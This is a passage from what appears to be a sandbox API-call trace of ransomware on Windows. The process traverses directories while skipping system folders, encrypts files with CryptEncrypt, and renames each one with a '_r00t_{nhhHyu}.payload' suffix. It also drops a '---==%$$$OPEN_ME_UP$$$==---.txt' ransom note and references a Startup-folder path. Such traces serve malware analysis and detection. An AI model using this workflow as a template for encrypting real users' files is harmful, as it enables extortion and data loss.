returned 1 [0060.355] GetProcessHeap () returned 0x5e0000 [0060.355] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x641a90 | out: hHeap=0x5e0000) returned 1 [0060.355] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.355] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0060.356] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0060.356] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0060.356] CloseHandle (hObject=0x430) returned 1 [0060.357] GetProcessHeap () returned 0x5e0000 [0060.357] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0060.357] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html_r00t_{nhhHyu}.payload") returned 64 [0060.357] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html_r00t_{nhhhyu}.payload")) returned 1 [0060.357] GetProcessHeap () returned 0x5e0000 [0060.357] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0060.357] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x159d5, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="DisplayIcon.ico", cAlternateFileName="DISPLA~1.ICO")) returned 1 [0060.357] lstrcmpiW (lpString1="DisplayIcon.ico", lpString2="Windows") returned -1 [0060.357] lstrcmpiW (lpString1="DisplayIcon.ico", lpString2="$Recycle.bin") returned 1 [0060.357] lstrcmpiW (lpString1="DisplayIcon.ico", lpString2="System Volume Information") returned -1 [0060.357] lstrcmpiW (lpString1="DisplayIcon.ico", lpString2="Program Files") returned -1 [0060.357] lstrcmpiW (lpString1="DisplayIcon.ico", lpString2="Program Files (x86)") returned -1 [0060.357] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 41 [0060.358] StrStrIW (lpFirst="DisplayIcon.ico", lpSrch=".payload") returned 0x0 [0060.358] lstrcmpW (lpString1="DisplayIcon.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.358] lstrcmpW (lpString1="DisplayIcon.ico", lpString2="taridd") returned -1 [0060.358] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.358] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0060.358] GetTickCount () returned 0x114f84c [0060.358] GetTickCount () returned 0x114f84c [0060.358] GetTickCount () returned 0x114f84c [0060.358] GetTickCount () returned 0x114f84c [0060.358] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0060.359] GetProcessHeap () returned 0x5e0000 [0060.359] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x641a90 [0060.359] ReadFile (in: hFile=0x430, lpBuffer=0x641a90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0060.361] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.361] WriteFile (in: hFile=0x430, lpBuffer=0x641a90*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x641a90*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0060.361] GetProcessHeap () returned 0x5e0000 [0060.361] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x641a90 | out: hHeap=0x5e0000) returned 1 [0060.361] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.361] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0060.361] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0060.361] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0060.361] CloseHandle (hObject=0x430) returned 1 [0060.451] GetProcessHeap () returned 0x5e0000 [0060.451] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0060.451] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico_r00t_{nhhHyu}.payload") returned 63 [0060.451] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico_r00t_{nhhhyu}.payload")) returned 1 [0060.452] GetProcessHeap () returned 0x5e0000 [0060.452] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0060.452] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Extended", cAlternateFileName="")) returned 1 [0060.452] lstrcmpiW (lpString1="Extended", lpString2="Windows") returned -1 [0060.452] lstrcmpiW (lpString1="Extended", lpString2="$Recycle.bin") returned 1 [0060.452] lstrcmpiW (lpString1="Extended", lpString2="System Volume Information") returned -1 [0060.452] lstrcmpiW (lpString1="Extended", lpString2="Program Files") returned -1 [0060.452] lstrcmpiW (lpString1="Extended", lpString2="Program Files (x86)") returned -1 [0060.452] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Extended") returned 34 [0060.452] lstrcmpW (lpString1="Extended", lpString2=".") returned 1 [0060.452] lstrcmpW (lpString1="Extended", lpString2="..") returned 1 [0060.452] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\Extended", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0060.452] GetProcessHeap () returned 0x5e0000 [0060.452] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0060.452] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Extended\\*") returned 36 [0060.452] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606260 [0060.452] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.452] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.452] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.452] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.452] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.452] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Extended\\.") returned 36 [0060.453] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.453] FindNextFileW (in: hFindFile=0x606260, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0060.453] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.453] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.453] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.453] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.453] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.453] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Extended\\..") returned 37 [0060.453] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.453] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.453] FindNextFileW (in: hFindFile=0x606260, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2a714f00, ftCreationTime.dwHighDateTime=0x1cac6f0, ftLastAccessTime.dwLowDateTime=0x2a714f00, ftLastAccessTime.dwHighDateTime=0x1cac6f0, ftLastWriteTime.dwLowDateTime=0x2a714f00, ftLastWriteTime.dwHighDateTime=0x1cac6f0, nFileSizeHigh=0x0, nFileSizeLow=0x16c82, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0060.453] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="Windows") returned -1 [0060.453] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="$Recycle.bin") returned 1 [0060.453] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="System Volume Information") returned -1 [0060.453] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="Program Files") returned -1 [0060.453] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="Program Files (x86)") returned -1 [0060.453] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 52 [0060.453] StrStrIW (lpFirst="Parameterinfo.xml", lpSrch=".payload") returned 0x0 [0060.453] lstrcmpW (lpString1="Parameterinfo.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.453] lstrcmpW (lpString1="Parameterinfo.xml", lpString2="taridd") returned -1 [0060.453] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.453] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.453] GetTickCount () returned 0x114f8a9 [0060.453] GetTickCount () returned 0x114f8a9 [0060.453] GetTickCount () returned 0x114f8a9 [0060.453] GetTickCount () returned 0x114f8a9 [0060.453] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.454] GetProcessHeap () returned 0x5e0000 [0060.454] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0060.454] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.456] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.456] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.456] GetProcessHeap () returned 0x5e0000 [0060.456] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.456] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.456] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.456] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.456] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.456] CloseHandle (hObject=0x438) returned 1 [0060.459] GetProcessHeap () returned 0x5e0000 [0060.459] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0060.459] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml_r00t_{nhhHyu}.payload") returned 74 [0060.459] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml_r00t_{nhhhyu}.payload")) returned 1 [0060.460] GetProcessHeap () returned 0x5e0000 [0060.460] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.460] FindNextFileW (in: hFindFile=0x606260, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0060.460] lstrcmpiW (lpString1="UiInfo.xml", lpString2="Windows") returned -1 [0060.460] lstrcmpiW (lpString1="UiInfo.xml", lpString2="$Recycle.bin") returned 1 [0060.460] lstrcmpiW (lpString1="UiInfo.xml", lpString2="System Volume Information") returned 1 [0060.460] lstrcmpiW (lpString1="UiInfo.xml", lpString2="Program Files") returned 1 [0060.460] lstrcmpiW (lpString1="UiInfo.xml", lpString2="Program Files (x86)") returned 1 [0060.460] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 45 [0060.460] StrStrIW (lpFirst="UiInfo.xml", lpSrch=".payload") returned 0x0 [0060.460] lstrcmpW (lpString1="UiInfo.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.460] lstrcmpW (lpString1="UiInfo.xml", lpString2="taridd") returned 1 [0060.460] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.460] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.460] GetTickCount () returned 0x114f8a9 [0060.460] GetTickCount () returned 0x114f8a9 [0060.460] GetTickCount () returned 0x114f8a9 [0060.460] GetTickCount () returned 0x114f8a9 [0060.460] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.460] GetProcessHeap () returned 0x5e0000 [0060.460] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0060.460] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.462] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.462] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.462] GetProcessHeap () returned 0x5e0000 [0060.463] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.463] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.463] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.463] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.463] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.463] CloseHandle (hObject=0x438) returned 1 [0060.465] GetProcessHeap () returned 0x5e0000 [0060.465] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0060.465] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml_r00t_{nhhHyu}.payload") returned 67 [0060.465] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml_r00t_{nhhhyu}.payload")) returned 1 [0060.465] GetProcessHeap () returned 0x5e0000 [0060.465] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.465] FindNextFileW (in: hFindFile=0x606260, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0060.465] FindClose (in: hFindFile=0x606260 | out: hFindFile=0x606260) returned 1 [0060.465] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Extended\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 66 [0060.465] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\extended\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0060.467] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0060.468] CloseHandle (hObject=0x430) returned 1 [0060.468] GetProcessHeap () returned 0x5e0000 [0060.468] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0060.468] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Graphics", cAlternateFileName="")) returned 1 [0060.468] lstrcmpiW (lpString1="Graphics", lpString2="Windows") returned -1 [0060.469] lstrcmpiW (lpString1="Graphics", lpString2="$Recycle.bin") returned 1 [0060.469] lstrcmpiW (lpString1="Graphics", lpString2="System Volume Information") returned -1 [0060.469] lstrcmpiW (lpString1="Graphics", lpString2="Program Files") returned -1 [0060.469] lstrcmpiW (lpString1="Graphics", lpString2="Program Files (x86)") returned -1 [0060.469] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics") returned 34 [0060.469] lstrcmpW (lpString1="Graphics", lpString2=".") returned 1 [0060.469] lstrcmpW (lpString1="Graphics", lpString2="..") returned 1 [0060.469] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\Graphics", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0060.469] GetProcessHeap () returned 0x5e0000 [0060.469] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0060.469] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\*") returned 36 [0060.469] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606420 [0060.470] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.470] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.470] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.470] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.470] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.470] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\.") returned 36 [0060.470] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.470] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: 